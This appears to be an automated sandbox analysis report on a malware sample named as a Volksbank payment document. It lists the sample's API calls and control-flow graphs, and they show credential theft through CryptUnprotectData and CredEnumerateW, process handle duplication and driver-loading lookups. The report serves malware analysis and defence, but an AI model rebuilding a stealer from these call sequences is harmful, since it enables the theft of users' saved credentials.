39028 40b04b ??3@YAXPAX 39024->39028 39025->39024 39027 406214 22 API calls 39025->39027 39027->39024 39028->39016 39029 40e0ea 39119 
4096dc CreateFileW 39029->39119 39031 40e0f1 CreateFileMappingW 39032 40e140 CloseHandle CloseHandle 39031->39032 39033 40e10b MapViewOfFile 39031->39033 39032->39023 39034 40e13b CloseHandle 39033->39034 39035 40e11f WriteFile UnmapViewOfFile 39033->39035 39034->39032 39035->39034 39037 40e18c 39036->39037 39120 406b90 39037->39120 39040 40e1a7 memset 39046 40e1e8 39040->39046 39041 40e299 39152 4069a3 39041->39152 39047 40e283 39046->39047 39048 40dd50 _wcsicmp 39046->39048 39054 40e244 _snwprintf 39046->39054 39130 406e8f 39046->39130 39159 40742e 8 API calls 39046->39159 39160 40aae3 wcslen wcslen _memicmp 39046->39160 39161 406b53 SetFilePointerEx ReadFile 39046->39161 39049 40e291 39047->39049 39050 40e288 free 39047->39050 39048->39046 39051 40aa04 free 39049->39051 39050->39049 39051->39041 39055 40a8d0 7 API calls 39054->39055 39055->39046 39057 40e2c2 39056->39057 39058 406b90 11 API calls 39057->39058 39059 40e2d3 39058->39059 39060 40e4a0 39059->39060 39062 406e8f 13 API calls 39059->39062 39065 40e489 39059->39065 39068 40dd50 _wcsicmp 39059->39068 39074 40e3e0 memcpy 39059->39074 39075 40e3fb memcpy 39059->39075 39076 40e3b3 wcschr 39059->39076 39077 40e416 memcpy 39059->39077 39078 40e431 memcpy 39059->39078 39162 40dd50 _wcsicmp 39059->39162 39171 40742e 8 API calls 39059->39171 39172 406b53 SetFilePointerEx ReadFile 39059->39172 39061 4069a3 2 API calls 39060->39061 39063 40e4ab 39061->39063 39062->39059 39063->39012 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068->39059 39069->39060 39071 40e376 memset 39163 40aa29 39071->39163 39074->39059 39075->39059 39076->39059 39077->39059 39078->39059 39079->38994 39081 406294 CloseHandle 39080->39081 39082 406224 39081->39082 39083 4096c3 CreateFileW 39082->39083 39084 40622d 39083->39084 39085 406281 GetLastError 39084->39085 39086 40a2ef ReadFile 39084->39086 39088 40625a 39085->39088 39087 406244 39086->39087 39087->39085 39089 40624b 
39087->39089 39088->39016 39091 40dd85 memset 39088->39091 39089->39088 39090 406777 19 API calls 39089->39090 39090->39088 39092 409bca GetModuleFileNameW 39091->39092 39093 40ddbe CreateFileW 39092->39093 39096 40ddf1 39093->39096 39094 40afcf ??2@YAPAXI ??3@YAXPAX 39094->39096 39095 41352f 9 API calls 39095->39096 39096->39094 39096->39095 39097 40de0b NtQuerySystemInformation 39096->39097 39098 40de3b CloseHandle GetCurrentProcessId 39096->39098 39097->39096 39099 40de54 39098->39099 39100 413d4c 47 API calls 39099->39100 39108 40de88 39100->39108 39101 40e00c 39102 413d29 free FreeLibrary 39101->39102 39103 40e014 39102->39103 39103->39016 39103->39019 39104 40dea9 _wcsicmp 39105 40dee7 OpenProcess 39104->39105 39106 40debd _wcsicmp 39104->39106 39105->39108 39106->39105 39107 40ded0 _wcsicmp 39106->39107 39107->39105 39107->39108 39108->39101 39108->39104 39109 40dfef CloseHandle 39108->39109 39110 40df78 39108->39110 39111 40df23 GetCurrentProcess DuplicateHandle 39108->39111 39114 40df8f CloseHandle 39108->39114 39109->39108 39110->39109 39110->39114 39115 40dfae _wcsicmp 39110->39115 39111->39108 39112 40df4c memset 39111->39112 39113 41352f 9 API calls 39112->39113 39113->39108 39114->39110 39115->39108 39115->39110 39117 409a74 GetTempFileNameW 39116->39117 39118 409a66 GetWindowsDirectoryW 39116->39118 39117->39029 39118->39117 39119->39031 39121 406bd5 39120->39121 39122 406bad 39120->39122 39124 4066bf free malloc memcpy free free 39121->39124 39129 406c0f 39121->39129 39122->39121 39123 406bba _wcsicmp 39122->39123 39123->39121 39123->39122 39125 406be5 39124->39125 39126 40afcf ??2@YAPAXI ??3@YAXPAX 39125->39126 39125->39129 39127 406bff 39126->39127 39128 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39127->39128 39128->39129 39129->39040 39129->39041 39132 406ed1 39130->39132 39131 407424 39131->39046 39132->39131 39133 40b633 free 39132->39133 39141 406f4e 39133->39141 39134 406f73 memset 39134->39141 39135 407080 free 
39135->39141 39136 40718b 39138 4069df memcpy 39136->39138 39149 40730b 39136->39149 39137 4099f4 malloc memcpy free 39137->39141 39150 4071f1 39138->39150 39139 4069df memcpy 39139->39141 39140 4069df memcpy 39142 4070d4 39140->39142 39141->39134 39141->39135 39141->39137 39141->39139 39141->39142 39143 406a10 memcpy 39141->39143 39144 406aa2 memcpy 39141->39144 39142->39131 39142->39136 39142->39140 39145 40717b 39142->39145 39143->39141 39144->39141 39146 4069df memcpy 39145->39146 39146->39136 39147 406c5a 6 API calls 39147->39149 39148 406c28 ??2@YAPAXI ??3@YAXPAX 39148->39149 39149->39131 39149->39147 39149->39148 39150->39149 39151 4069df memcpy 39150->39151 39151->39150 39153 4069c4 ??3@YAXPAX 39152->39153 39154 4069af 39153->39154 39155 40b633 free 39154->39155 39156 4069ba 39155->39156 39157 40b04b ??3@YAXPAX 39156->39157 39158 4069c2 39157->39158 39158->39012 39159->39046 39160->39046 39161->39046 39162->39071 39164 40aa33 39163->39164 39165 40aa63 39163->39165 39166 40aa44 39164->39166 39167 40aa38 wcslen 39164->39167 39165->39059 39168 40a9ce malloc memcpy free free 39166->39168 39167->39166 39169 40aa4d 39168->39169 39169->39165 39170 40aa51 memcpy 39169->39170 39170->39165 39171->39059 39172->39059 39177 40a980 39173->39177 39174 40a8bb 39174->38919 39174->38920 39175 40a995 _wcsicmp 39175->39177 39176 40a99c wcscmp 39176->39177 39177->39174 39177->39175 39177->39176 39178->38923 39179->38927 39181 40aa23 RegEnumValueW 39180->39181 39181->38934 39181->38935 39183 405335 39182->39183 39184 40522a 39182->39184 39183->38512 39185 40b2cc 27 API calls 39184->39185 39186 405234 39185->39186 39187 40a804 8 API calls 39186->39187 39188 40523a 39187->39188 39227 40b273 39188->39227 39190 405248 _mbscpy _mbscat GetProcAddress 39191 40b273 27 API calls 39190->39191 39192 405279 39191->39192 39230 405211 GetProcAddress 39192->39230 39194 405282 39195 40b273 27 API calls 39194->39195 39196 40528f 39195->39196 39231 405211 GetProcAddress 39196->39231 39198 405298 
39199 40b273 27 API calls 39198->39199 39200 4052a5 39199->39200 39232 405211 GetProcAddress 39200->39232 39202 4052ae 39203 40b273 27 API calls 39202->39203 39204 4052bb 39203->39204 39233 405211 GetProcAddress 39204->39233 39206 4052c4 39207 40b273 27 API calls 39206->39207 39208 4052d1 39207->39208 39234 405211 GetProcAddress 39208->39234 39210 4052da 39211 40b273 27 API calls 39210->39211 39212 4052e7 39211->39212 39235 405211 GetProcAddress 39212->39235 39214 4052f0 39215 40b273 27 API calls 39214->39215 39216 4052fd 39215->39216 39236 405211 GetProcAddress 39216->39236 39218 405306 39219 40b273 27 API calls 39218->39219 39220 405313 39219->39220 39237 405211 GetProcAddress 39220->39237 39228 40b58d 27 API calls 39227->39228 39229 40b18c 39228->39229 39229->39190 39230->39194 39231->39198 39232->39202 39233->39206 39234->39210 39235->39214 39236->39218 39240 405220 39 API calls 39239->39240 39241 405369 39240->39241 39241->38952 39241->38953 39242->38955 39243->38959 39244->38956 39245->38953 39247 40440c FreeLibrary 39246->39247 39248 40436d 39247->39248 39249 40a804 8 API calls 39248->39249 39250 404377 39249->39250 39251 404383 39250->39251 39252 404405 39250->39252 39253 40b273 27 API calls 39251->39253 39252->38522 39252->38523 39252->38524 39254 40438d GetProcAddress 39253->39254 39255 40b273 27 API calls 39254->39255 39256 4043a7 GetProcAddress 39255->39256 39257 40b273 27 API calls 39256->39257 39258 4043ba GetProcAddress 39257->39258 39259 40b273 27 API calls 39258->39259 39260 4043ce GetProcAddress 39259->39260 39261 40b273 27 API calls 39260->39261 39262 4043e2 GetProcAddress 39261->39262 39263 4043f1 39262->39263 39264 4043f7 39263->39264 39265 40440c FreeLibrary 39263->39265 39264->39252 39265->39252 39267 404413 FreeLibrary 39266->39267 39268 40441e 39266->39268 39267->39268 39268->38540 39269->38536 39271 40447e 39270->39271 39272 40442e 39270->39272 39273 404485 CryptUnprotectData 39271->39273 39274 40449c 39271->39274 39275 40b2cc 27 API calls 
39272->39275 39273->39274 39274->38536 39276 404438 39275->39276 39277 40a804 8 API calls 39276->39277 39278 40443e 39277->39278 39279 404445 39278->39279 39280 404467 39278->39280 39281 40b273 27 API calls 39279->39281 39280->39271 39283 404475 FreeLibrary 39280->39283 39282 40444f GetProcAddress 39281->39282 39282->39280 39284 404460 39282->39284 39283->39271 39284->39280 39286 4135f6 39285->39286 39287 4135eb FreeLibrary 39285->39287 39286->38543 39287->39286 39289 4449c4 39288->39289 39290 444a52 39288->39290 39291 40b2cc 27 API calls 39289->39291 39290->38560 39290->38561 39292 4449cb 39291->39292 39293 40a804 8 API calls 39292->39293 39294 4449d1 39293->39294 39295 40b273 27 API calls 39294->39295 39296 4449dc GetProcAddress 39295->39296 39297 40b273 27 API calls 39296->39297 39298 4449f3 GetProcAddress 39297->39298 39299 40b273 27 API calls 39298->39299 39300 444a04 GetProcAddress 39299->39300 39301 40b273 27 API calls 39300->39301 39302 444a15 GetProcAddress 39301->39302 39309->38571 39310->38571 39311->38571 39312->38571 39313->38562 39315 403a29 39314->39315 39329 403bed memset memset 39315->39329 39317 403ae7 39342 40b1ab free free 39317->39342 39319 403a3f memset 39323 403a2f 39319->39323 39320 403aef 39320->38579 39321 40a8d0 7 API calls 39321->39323 39322 409d1f 6 API calls 39322->39323 39323->39317 39323->39319 39323->39321 39323->39322 39324 409b98 GetFileAttributesW 39323->39324 39324->39323 39326 40a051 GetFileTime CloseHandle 39325->39326 39327 4039ca CompareFileTime 39325->39327 39326->39327 39327->38579 39328->38578 39330 414c2e 17 API calls 39329->39330 39331 403c38 39330->39331 39332 409719 2 API calls 39331->39332 39333 403c3f wcscat 39332->39333 39334 414c2e 17 API calls 39333->39334 39335 403c61 39334->39335 39336 409719 2 API calls 39335->39336 39337 403c68 wcscat 39336->39337 39343 403af5 39337->39343 39340 403af5 20 API calls 39341 403c95 39340->39341 39341->39323 39342->39320 39344 403b02 39343->39344 39345 40ae18 9 API calls 
[Control-flow graph edge list for the preceding function (node-id -> node-id pairs with addresses and API call counts, rendered as a graph image in the original report) omitted.]

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph for the function starting at 40dd85 (basic blocks and edges rendered as an image in the original report; textual node list omitted).]

APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2

Strings

Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp

Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                          • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

Control-flow Graph
control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 648 413edb-413ee2 646->648 647->648 653 413ee4 648->653 654 413ee7-413efe 648->654 662 413ea2-413eae CloseHandle 650->662 655 413e61-413e68 651->655 656 413e37-413e44 GetModuleHandleW 651->656 653->654 654->638 655->650 659 413e6a-413e77 QueryFullProcessImageNameW 655->659 656->655 658 413e46-413e5c GetProcAddress 656->658 658->655 659->650 662->641
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• memset.MSVCRT ref: 00413E07
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• free.MSVCRT ref: 00413EC1
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 3536422406-1740548384
• Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
• Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
• Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
• Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

Control-flow Graph
control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
APIs
• GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: AE$BIN
• API String ID: 1668488027-3931574542
• Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 767404330-0
                                                                                                                                                                                                                                          • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 00407082
  • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
Memory Dump Source
• Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: free$memcpymemset
• String ID:
• API String ID: 2037443186-0
• Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
• Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
• Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
• Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55

Control-flow Graph

APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
